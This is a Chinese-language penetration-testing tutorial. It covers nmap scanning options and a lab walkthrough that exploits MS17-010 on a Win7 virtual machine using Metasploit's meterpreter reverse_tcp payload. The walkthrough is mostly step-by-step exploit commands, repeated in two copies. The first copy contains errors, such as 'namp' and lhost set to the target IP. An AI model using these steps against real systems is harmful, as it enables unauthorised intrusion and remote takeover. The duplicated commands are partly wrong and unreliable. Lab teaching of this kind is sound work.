渗透测试基础
渗透测试(Penetration Testing):就是一种通过模拟恶意攻击者的技术与方法,挫败目 标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全 测试与评估方法。
安全漏洞:指信息系统中存在的缺陷或不适当的配置,他们可使攻击者在未授权情况下 访问或破坏系统,导致信息系统面临安全风险。
渗透代码(Exploit):利用安全漏洞来造成入侵或破坏效果的程序。
渗透测试-目标分类
主机操作系统渗透对Windows、Solaris、AIX、Linux、SCO、SGI等操作系统本身 进行渗透测试。
数据库系统渗透对MS-SQL、Oracle、MySQL、Informix、Sybase、DB2、Access等 数据库应用系统进行渗透测试。
应用系统渗透对渗透目标提供的各种应用,如ASP、CGI、JSP、PHP等组成的 WWW应用进行渗透测试。
网络设备渗透对各种防火墙、入侵检测系统、网络设备进行渗透测试。
渗透测试的意义
渗透测试是站在第三者的角度来思考企业系统的安全性的,通过渗透测试可以发觉 企业潜在却未纰漏的安全性问题。企业可以根据测试的结果对内部系统中的不足以 及安全脆弱点进行加固以及改善,从而使企业系统变得更加安全,减低企业的风险。
主机漏洞利用演示
Kali简介:Kali 是基于Debian的Linux发行版,设计用于数字取证和渗透测试的操作系统。预 装了许多渗透测试软件,包括nmap(端口扫描器)、Wireshark (数据包分析器)、 John the Ripper (密码破解器),以及Aircrack-ng (应用于对无线局域网进行渗透测试 的软件)。
Nmap扫描工具
Nmap 全称为 NetworkMapper,Nmap是目前最流行的网络扫描工具,不仅能准确探测单台主机的详细情 况,而且能高效地对大范围的Ip地址段扫描。能扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至知道网络中使用了何种类型的防火墙设备等。
Nmap基本功能
- 主机发现(Host Discovery)
- 端口扫描(Port Scanning)
- 版本侦测(Version Detection)
- 操作系统侦测(Operating System Detection)
Nmap常用扫描命令
1.完整的全面扫描 命令为:namp –T4 –A –v ip
-A 选项用于使用进攻性(Aggressive)方式扫描; -T4 指定扫描过程使用的时序(Timing),总有6个级别(0-5),级别 越高,速度越快,但也容易被防火墙发现; -v 表示显示冗余(verbosity)信息,在扫描过程中显示扫描的细节 从而让用户了解当前的扫描状态。
- 扫描多台主机 命令为:
nmap ***.***.***.1 ***.***.***.2 ***.***.***.3 - 扫描整个子网 命令为:
nmap 192.168.199.*
Nmap其他常用扫描命令
-sT:TCP connect扫描 -sS:TCP SYN扫描; -sF/-sX/-sN:通过发送一些特殊的标志位以避开设备或软件的检测; -sP:通过发送ICMP echo请求探测主机是否存活,原理同Ping; -sU:探测目标主机开放了哪些UDP端口 -sA:TCP ACK扫描,对防火墙上未屏蔽的端口进行探测; -sV:获取对应端口上更为详细的服务版本信息; -Pn:在扫描之前,不发送ICMP echo请求测试目标是否存活; -O:启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统 类型等信息; -F:快速扫描模式,只扫描在nmap-services中列出的端口。
ms17-010漏洞攻击
官方描述: docs.microsoft.com/en-us/secur…
漏洞描述:这个漏洞是Microso Windows SMB Server远程代码执行漏洞;Microso Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。
软件:Vmware Workstation 14
攻击机:Kali
靶机环境:Win7
代码运行
sudo su(输入密码 kali ) #开启管理员标签
nmap 192.168.(ip 网段)/24 #使用nmap搜索同网段主机ip
nmap (被攻击电脑ip) #搜索目标主机所用的系统是什么
msfconsole #打开msf
search ms17-010(里面的0,1,4都代表攻击载荷、2,3代表辅助扫描验证的模块) #查找ms17- 010
use 3 #使用第三个模式
show options
set lhosts (目标主机ip) #设置目标主机ip
run #开始运行
use 0 #使用第零个模式
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷
set rhosts (目标主机ip) #设置目标主机ip
set lhost (攻击方主机ip) #设置攻击方主机ip
run #开始攻击
过程图片
sudo su(输入密码 kali ) #开启管理员标签
nmap 192.168.(ip 网段)/24 #使用nmap搜索同网段主机ip
nmap (被攻击电脑ip) #搜索目标主机所用的系统是什么
msfconsole #打开msf
search ms17-010(里面的exploit开头的代表攻击载荷、auxiliary代表辅助扫描验证的模块) #查找ms17- 010
use 3 #使用第三个模式
show options
set rhosts (目标主机ip)#设置目标主机ip
run #开始运行
use 0 #使用第零个模式
set payload windows/x64/meterpreter/reverse\_tcp #设置攻击载荷
set rhosts (目标主机ip) #设置目标主机ip
set lhost (攻击方主机ip) #设置攻击方主机ip
run #开始攻击
显示成图示这样就算是攻击成功,好耶!!!